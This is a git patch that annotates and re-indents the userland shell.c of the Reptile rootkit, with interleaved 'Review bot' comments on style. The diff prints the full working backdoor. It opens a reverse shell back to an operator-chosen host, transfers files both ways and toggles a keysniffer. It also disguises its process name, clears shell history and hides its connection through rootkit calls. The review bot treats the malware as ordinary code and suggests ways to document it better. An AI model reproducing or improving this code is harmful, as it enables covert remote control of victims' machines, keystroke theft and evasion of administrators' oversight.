From a9b1a596df98ff129f84cb7d29f954376a4e987a Mon Sep 17 00:00:00 2001
From: waiwai <3027307205@qq.com>
Date: Sun, 29 Dec 2024 23:03:12 +0800
Subject: [PATCH] =?UTF-8?q?=E8=A1=A5=E5=85=85shell=E6=B3=A8=E9=87=8A?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 src/Reptile/userland/shell.c | 700 ++++++++++++++++++-----------------
 1 file changed, 360 insertions(+), 340 deletions(-)
diff --git a/src/Reptile/userland/shell.c b/src/Reptile/userland/shell.c
index 92c4834..acca08d 100644
--- a/src/Reptile/userland/shell.c
+++ b/src/Reptile/userland/shell.c
@@ -15,7 +15,7 @@ #include "config.h" #include "pel.h" -#define ERROR -1 +#define ERROR -1 unsigned char message[BUFSIZE + 1]; extern char *optarg; 
@@ -23,224 +23,239 @@ char *rcfile; #ifndef _REPTILE_ +// 打印使用说明 void usage(char *argv0) { - fprintf(stderr, "Usage: %s [ -t connect_back_host ] ", argv0); - fprintf(stderr, "[ -p port ] [ -s secret ] [ -r delay (optional) ]\n"); + fprintf(stderr, "Usage: %s [ -t connect_back_host ] ", argv0); + fprintf(stderr, "[ -p port ] [ -s secret ] [ -r delay (optional) ]\n"); } #endif +// 获取文件 int get_file(int client) { - int ret, len, fd; + int ret, len, fd; - ret = pel_recv_msg(client, message, &len); + // 接收文件名 + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); + if (ret != PEL_SUCCESS) + return (ERROR); - if (message[0] == OUT) - return 1; + if (message[0] == OUT) + return 1; - message[len] = '\0'; + message[len] = '\0'; - fd = open((char *)message, O_RDONLY); + // 打开文件 + fd = open((char *)message, O_RDONLY); - if (fd < 0) - return (ERROR); + if (fd < 0) + return (ERROR); - while (1) { - len = read(fd, message, BUFSIZE); + // 读取文件内容并发送 + while (1) { + len = read(fd, message, BUFSIZE); - if (len == 0) - break; - if (len < 0) - return (ERROR); + if (len == 0) + break; + if (len < 0) + return (ERROR); - ret = pel_send_msg(client, message, len); + ret = pel_send_msg(client, message, len); - if (ret != PEL_SUCCESS) - return (ERROR); - } - return 0; + if (ret != PEL_SUCCESS) + return (ERROR); + } + return 0; } +// 上传文件 int put_file(int client) { - int ret, len, fd; + int ret, len, fd; - ret = pel_recv_msg(client, message, &len); + // 接收文件名 + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); + if (ret != PEL_SUCCESS) + return (ERROR); - if (message[0] == OUT) - return (ERROR); + if (message[0] == OUT) + return (ERROR); - message[len] = '\0'; - fd = creat((char *)message, 0644); + message[len] = '\0'; + fd = creat((char *)message, 0644); - if (fd < 0) - return (ERROR); + if (fd < 0) + return (ERROR); - while (1) { - ret = pel_recv_msg(client, message, &len); + // 接收文件内容并写入 + while (1) { + ret = 
pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); + if (ret != PEL_SUCCESS) + return (ERROR); - if (strncmp((char *)message, EXIT, EXIT_LEN) == 0) - break; + if (strncmp((char *)message, EXIT, EXIT_LEN) == 0) + break; - if (write(fd, message, len) != len) - return (ERROR); - } - return 0; + if (write(fd, message, len) != len) + return (ERROR); + } + return 0; } +// 运行 shell int runshell(int client) { - fd_set rd; - struct winsize ws; - char *slave, *temp, *shell; - int ret, len, pid, pty, tty, n; + fd_set rd; + struct winsize ws; + char *slave, *temp, *shell; + int ret, len, pid, pty, tty, n; - if (openpty(&pty, &tty, NULL, NULL, NULL) < 0) - return (ERROR); + // 打开伪终端 + if (openpty(&pty, &tty, NULL, NULL, NULL) < 0) + return (ERROR); - slave = ttyname(tty); + slave = ttyname(tty); - if (slave == NULL) - return (ERROR); + if (slave == NULL) + return (ERROR); - chdir(HOMEDIR); - putenv("HISTFILE="); + chdir(HOMEDIR); + putenv("HISTFILE="); - ret = pel_recv_msg(client, message, &len); + // 接收终端类型 + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); + if (ret != PEL_SUCCESS) + return (ERROR); - message[len] = '\0'; - setenv("TERM", (char *)message, 1); + message[len] = '\0'; + setenv("TERM", (char *)message, 1); - ret = pel_recv_msg(client, message, &len); + // 接收窗口大小 + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS || len != 4) - return (ERROR); + if (ret != PEL_SUCCESS || len != 4) + return (ERROR); - ws.ws_row = ((int)message[0] << 8) + (int)message[1]; - ws.ws_col = ((int)message[2] << 8) + (int)message[3]; - ws.ws_xpixel = 0; - ws.ws_ypixel = 0; + ws.ws_row = ((int)message[0] << 8) + (int)message[1]; + ws.ws_col = ((int)message[2] << 8) + (int)message[3]; + ws.ws_xpixel = 0; + ws.ws_ypixel = 0; - if (ioctl(pty, TIOCSWINSZ, &ws) < 0) - return (ERROR); + if (ioctl(pty, TIOCSWINSZ, &ws) < 0) + return (ERROR); - ret = pel_recv_msg(client, message, &len); + // 接收命令 + ret = 
pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); + if (ret != PEL_SUCCESS) + return (ERROR); - if (len == 1 && message[0] == RUNSHELL) { - temp = (char *)malloc(20 + strlen(rcfile)); + if (len == 1 && message[0] == RUNSHELL) { + temp = (char *)malloc(20 + strlen(rcfile)); - if (temp == NULL) - return (ERROR); + if (temp == NULL) + return (ERROR); - strcpy(temp, "exec bash --rcfile "); - strcat(temp, rcfile); - } else { - message[len] = '\0'; - temp = (char *)malloc(len + 1); + strcpy(temp, "exec bash --rcfile "); + strcat(temp, rcfile); + } else { + message[len] = '\0'; + temp = (char *)malloc(len + 1); - if (temp == NULL) - return (ERROR); + if (temp == NULL) + return (ERROR); - strncpy(temp, (char *)message, len + 1); - } + strncpy(temp, (char *)message, len + 1); + } - pid = fork(); + // 创建子进程 + pid = fork(); - if (pid < 0) { - free(temp); - return (ERROR); - } + if (pid < 0) { + free(temp); + return (ERROR); + } - if (pid == 0) { - close(client); - close(pty); + if (pid == 0) { + close(client); + close(pty); - if (setsid() < 0) { - free(temp); - return (ERROR); - } + if (setsid() < 0) { + free(temp); + return (ERROR); + } - if (ioctl(tty, TIOCSCTTY, NULL) < 0) { - free(temp); - return (ERROR); - } + if (ioctl(tty, TIOCSCTTY, NULL) < 0) { + free(temp); + return (ERROR); + } - dup2(tty, 0); - dup2(tty, 1); - dup2(tty, 2); + dup2(tty, 0); + dup2(tty, 1); + dup2(tty, 2); - if (tty > 2) - close(tty); + if (tty > 2) + close(tty); - shell = (char *)malloc(10); + shell = (char *)malloc(10); - if (shell == NULL) { - free(temp); - return (ERROR); - } + if (shell == NULL) { + free(temp); + return (ERROR); + } - strcpy(shell, "/bin/bash"); + strcpy(shell, "/bin/bash"); - execl(shell, shell + 5, "-c", temp, (char *)0); - free(temp); - free(shell); + execl(shell, shell + 5, "-c", temp, (char *)0); + free(temp); + free(shell); - return 0; - } else { - close(tty); + return 0; + } else { + close(tty); - while (1) { - FD_ZERO(&rd); - 
FD_SET(client, &rd); - FD_SET(pty, &rd); + // 处理数据传输 + while (1) { + FD_ZERO(&rd); + FD_SET(client, &rd); + FD_SET(pty, &rd); - n = (pty > client) ? pty : client; + n = (pty > client) ? pty : client; - if (select(n + 1, &rd, NULL, NULL, NULL) < 0) - return (ERROR); + if (select(n + 1, &rd, NULL, NULL, NULL) < 0) + return (ERROR); - if (FD_ISSET(client, &rd)) { - ret = pel_recv_msg(client, message, &len); + if (FD_ISSET(client, &rd)) { + ret = pel_recv_msg(client, message, &len); - if (ret != PEL_SUCCESS) - return (ERROR); - if (write(pty, message, len) != len) - return (ERROR); - } + if (ret != PEL_SUCCESS) + return (ERROR); + if (write(pty, message, len) != len) + return (ERROR); + } - if (FD_ISSET(pty, &rd)) { - len = read(pty, message, BUFSIZE); + if (FD_ISSET(pty, &rd)) { + len = read(pty, message, BUFSIZE); - if (len == 0) - break; - if (len < 0) - return (ERROR); + if (len == 0) + break; + if (len < 0) + return (ERROR); - ret = pel_send_msg(client, message, len); + ret = pel_send_msg(client, message, len); - if (ret != PEL_SUCCESS) - return (ERROR); - } - } - return 0; - } + if (ret != PEL_SUCCESS) + return (ERROR); + } + } + return 0; + } } #ifdef _REPTILE_ 
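Review bot: The comments added above `open`, `fork` and each `pel_recv_msg` in get_file, put_file and runshell restate the call on the line below them instead of the contract a reader needs; get_file's header comment would carry more as `// Returns 0 after the whole file is sent, 1 when the first message begins with OUT, ERROR on any recv/open/read/send failure`, and put_file's as `// Returns 0 once an EXIT message is received, ERROR otherwise`. Both functions, and runshell, write `message[len] = '\0'` into an array declared as BUFSIZE + 1 bytes, so the comment on the first `pel_recv_msg` call should record the assumption that it never reports a `len` above BUFSIZE — pel.c is not in this diff, so that has to be confirmed there. Separately, almost every line of this hunk and of the following one (hide_conn, build_rcfile_path, main) is a whitespace-only re-indentation, which is why a comment-only commit shows 360 insertions and 340 deletions; the re-indentation should be its own commit so the comment additions can be reviewed and blamed on their own.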
@@ -249,260 +264,265 @@ int runshell(int client) #define UNHIDE 0 struct control { - unsigned short cmd; - void *argv; + unsigned short cmd; + void *argv; }; +// 隐藏连接 void hide_conn(struct sockaddr_in addr, int hide) { - struct control args; - int sockioctl = socket(AF_INET, SOCK_STREAM, 6); + struct control args; + int sockioctl = socket(AF_INET, SOCK_STREAM, 6); - if (sockioctl < 0) - exit(1); + if (sockioctl < 0) + exit(1); - if (hide) { - args.cmd = 4; - } else { - args.cmd = 5; - } + if (hide) { + args.cmd = 4; + } else { + args.cmd = 5; + } - args.argv = &addr; + args.argv = &addr; - if (ioctl(sockioctl, AUTH, HTUA) == 0) { - if (ioctl(sockioctl, AUTH, &args) == 0) - ioctl(sockioctl, AUTH, HTUA); - } + if (ioctl(sockioctl, AUTH, HTUA) == 0) { + if (ioctl(sockioctl, AUTH, &args) == 0) + ioctl(sockioctl, AUTH, HTUA); + } - close(sockioctl); + close(sockioctl); } #endif +// 构建 rcfile 路径 int build_rcfile_path(void) { - char *name = NAME; - int len = 6 + strlen(name) + strlen(name); + char *name = NAME; + int len = 6 + strlen(name) + strlen(name); - rcfile = (char *)malloc(len); + rcfile = (char *)malloc(len); - if (rcfile == NULL) - return -1; + if (rcfile == NULL) + return -1; - snprintf(rcfile, len, "/%s/%s_rc", name, name); - return 0; + snprintf(rcfile, len, "/%s/%s_rc", name, name); + return 0; } int main(int argc, char **argv) { - int ret, len, pid, opt, client, arg0_len, delay = 0; - short int connect_back_port = 0; - char *connect_back_host = NULL; - char *secret = NULL; - struct sockaddr_in client_addr; - struct hostent *client_host; - socklen_t n; - - while ((opt = getopt(argc, argv, "t:s:p:r:")) != -1) { - switch (opt) { - case 't': - connect_back_host = strdup(optarg); - break; - case 'p': - connect_back_port = atoi(optarg); - if (!connect_back_port) { + int ret, len, pid, opt, client, arg0_len, delay = 0; + short int connect_back_port = 0; + char *connect_back_host = NULL; + char *secret = NULL; + struct sockaddr_in client_addr; + struct hostent 
*client_host; + socklen_t n; + + // 解析命令行参数 + while ((opt = getopt(argc, argv, "t:s:p:r:")) != -1) { + switch (opt) { + case 't': + connect_back_host = strdup(optarg); + break; + case 'p': + connect_back_port = atoi(optarg); + if (!connect_back_port) { #ifndef _REPTILE_ - usage(*argv); + usage(*argv); #endif - goto out; - } - break; - case 's': - secret = strdup(optarg); - break; - case 'r': - delay = atoi(optarg); - break; - default: + goto out; + } + break; + case 's': + secret = strdup(optarg); + break; + case 'r': + delay = atoi(optarg); + break; + default: #ifndef _REPTILE_ - usage(*argv); + usage(*argv); #endif - exit(1); - break; - } - } + exit(1); + break; + } + } - if (connect_back_host == NULL || connect_back_port == 0 || - secret == NULL) { + if (connect_back_host == NULL || connect_back_port == 0 || + secret == NULL) { #ifndef _REPTILE_ - usage(*argv); + usage(*argv); #endif - goto out; - } - - arg0_len = strlen(argv[0]); - bzero(argv[0], arg0_len); - - if (arg0_len >= 7) - strcpy(argv[0], "[ata/0]"); - - if(argv[1]) - bzero(argv[1], strlen(argv[1])); - - if(argv[2]) - bzero(argv[2], strlen(argv[2])); - - if(argv[3]) - bzero(argv[3], strlen(argv[3])); - - if(argv[4]) - bzero(argv[4], strlen(argv[4])); - - if(argv[5]) - bzero(argv[5], strlen(argv[5])); - - if(argv[6]) - bzero(argv[6], strlen(argv[6])); - - if(argv[7]) - bzero(argv[7], strlen(argv[7])); - - if(argv[8]) - bzero(argv[8], strlen(argv[8])); - - if (build_rcfile_path()) - goto out; - - pid = fork(); - - if (pid < 0) - return (ERROR); - - if (pid != 0) - return 0; - - if (setsid() < 0) - return (ERROR); - - for (n = 0; n < 1024; n++) - close(n); - - do { - if (delay > 0) - sleep(delay); - - client = socket(PF_INET, SOCK_STREAM, 0); - if (client < 0) - continue; - - client_host = gethostbyname(connect_back_host); - if (client_host == NULL) - continue; - - memcpy((void *)&client_addr.sin_addr, - (void *)client_host->h_addr, client_host->h_length); - - client_addr.sin_family = AF_INET; - 
client_addr.sin_port = htons(connect_back_port); - - ret = connect(client, (struct sockaddr *)&client_addr, - sizeof(client_addr)); - - if (ret < 0) { - close(client); - continue; - } + goto out; + } + + // 隐藏进程名称 + arg0_len = strlen(argv[0]); + bzero(argv[0], arg0_len); + + if (arg0_len >= 7) + strcpy(argv[0], "[ata/0]"); + + if(argv[1]) + bzero(argv[1], strlen(argv[1])); + + if(argv[2]) + bzero(argv[2], strlen(argv[2])); + + if(argv[3]) + bzero(argv[3], strlen(argv[3])); + + if(argv[4]) + bzero(argv[4], strlen(argv[4])); + + if(argv[5]) + bzero(argv[5], strlen(argv[5])); + + if(argv[6]) + bzero(argv[6], strlen(argv[6])); + + if(argv[7]) + bzero(argv[7], strlen(argv[7])); + + if(argv[8]) + bzero(argv[8], strlen(argv[8])); + + if (build_rcfile_path()) + goto out; + + // 创建子进程 + pid = fork(); + + if (pid < 0) + return (ERROR); + + if (pid != 0) + return 0; + + if (setsid() < 0) + return (ERROR); + + for (n = 0; n < 1024; n++) + close(n); + + do { + if (delay > 0) + sleep(delay); + + client = socket(PF_INET, SOCK_STREAM, 0); + if (client < 0) + continue; + + client_host = gethostbyname(connect_back_host); + if (client_host == NULL) + continue; + + memcpy((void *)&client_addr.sin_addr, + (void *)client_host->h_addr, client_host->h_length); + + client_addr.sin_family = AF_INET; + client_addr.sin_port = htons(connect_back_port); + + ret = connect(client, (struct sockaddr *)&client_addr, + sizeof(client_addr)); + + if (ret < 0) { + close(client); + continue; + } #ifdef _REPTILE_ - hide_conn(client_addr, HIDE); + hide_conn(client_addr, HIDE); #endif - ret = pel_server_init(client, secret); + ret = pel_server_init(client, secret); - if (ret != PEL_SUCCESS) { - shutdown(client, 2); + if (ret != PEL_SUCCESS) { + shutdown(client, 2); #ifdef _REPTILE_ - hide_conn(client_addr, UNHIDE); + hide_conn(client_addr, UNHIDE); #endif - continue; - } + continue; + } - connect: + connect: - ret = pel_recv_msg(client, message, &len); + ret = pel_recv_msg(client, message, &len); - if (ret 
== PEL_SUCCESS || len == 1) { - if (strcmp((char *)message, EXIT) == 0) - goto end; + if (ret == PEL_SUCCESS || len == 1) { + if (strcmp((char *)message, EXIT) == 0) + goto end; - switch (message[0]) { - case GET_FILE: - ret = get_file(client); + switch (message[0]) { + case GET_FILE: + ret = get_file(client); - if (ret) - goto connect; + if (ret) + goto connect; - if (pel_send_msg(client, (unsigned char *)EXIT, - EXIT_LEN) != PEL_SUCCESS) - goto end; + if (pel_send_msg(client, (unsigned char *)EXIT, + EXIT_LEN) != PEL_SUCCESS) + goto end; - goto connect; - case PUT_FILE: - put_file(client); - goto connect; - case RUNSHELL: - runshell(client); - if (pel_send_msg(client, (unsigned char *)EXIT, - EXIT_LEN) != PEL_SUCCESS) - goto end; + goto connect; + case PUT_FILE: + put_file(client); + goto connect; + case RUNSHELL: + runshell(client); + if (pel_send_msg(client, (unsigned char *)EXIT, + EXIT_LEN) != PEL_SUCCESS) + goto end; - goto connect; - case SET_DELAY: - if (pel_recv_msg(client, message, &len) != - PEL_SUCCESS) - goto end; + goto connect; + case SET_DELAY: + if (pel_recv_msg(client, message, &len) != + PEL_SUCCESS) + goto end; - if (message[0] == 5) - goto connect; + if (message[0] == 5) + goto connect; - message[len] = '\0'; - delay = atoi((char *)message); + message[len] = '\0'; + delay = atoi((char *)message); - goto connect; - case 'K': // 添加 keysniffer 命令处理 - if (pel_recv_msg(client, message, &len) != PEL_SUCCESS) - goto end; - if (strcmp((char *)message, "start") == 0) { - start_keysniffer(); + goto connect; + case 'K': // 添加 keysniffer 命令处理 + if (pel_recv_msg(client, message, &len) != PEL_SUCCESS) + goto end; + if (strcmp((char *)message, "start") == 0) { + start_keysniffer(); } - else if (strcmp((char *)message, "stop") == 0) { - stop_keysniffer(); + else if (strcmp((char *)message, "stop") == 0) { + stop_keysniffer(); } if (pel_send_msg(client, (unsigned char *)EXIT, EXIT_LEN) != PEL_SUCCESS) - goto end; + goto end; goto connect; - default: - break; - 
} - } - end: - shutdown(client, 2); + default: + break; + } + } + end: + shutdown(client, 2); #ifdef _REPTILE_ - hide_conn(client_addr, UNHIDE); + hide_conn(client_addr, UNHIDE); #endif - } while (delay > 0); + } while (delay > 0); out: - if (connect_back_host) - free(connect_back_host); + if (connect_back_host) + free(connect_back_host); - if (secret) - free(secret); + if (secret) + free(secret); - return 0; -} + return 0; +} \ No newline at end of file
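Review bot: The new side drops the file's trailing newline — the old `-}` ended the file with one, the new `+}` is followed by `\ No newline at end of file` — so it should be restored before merging to keep later diffs and `git diff --check` clean. The comment `// 创建子进程` added above `pid = fork();` in main names the call rather than the step: the lines that follow show the parent returning 0 at once while the child calls `setsid()` and closes descriptors 0 through 1023 before entering the connect loop. A comment that states that, such as `// Daemonize: parent returns immediately; child detaches from the session and drops every inherited fd`, tells the reader what the fork is for instead of repeating its name.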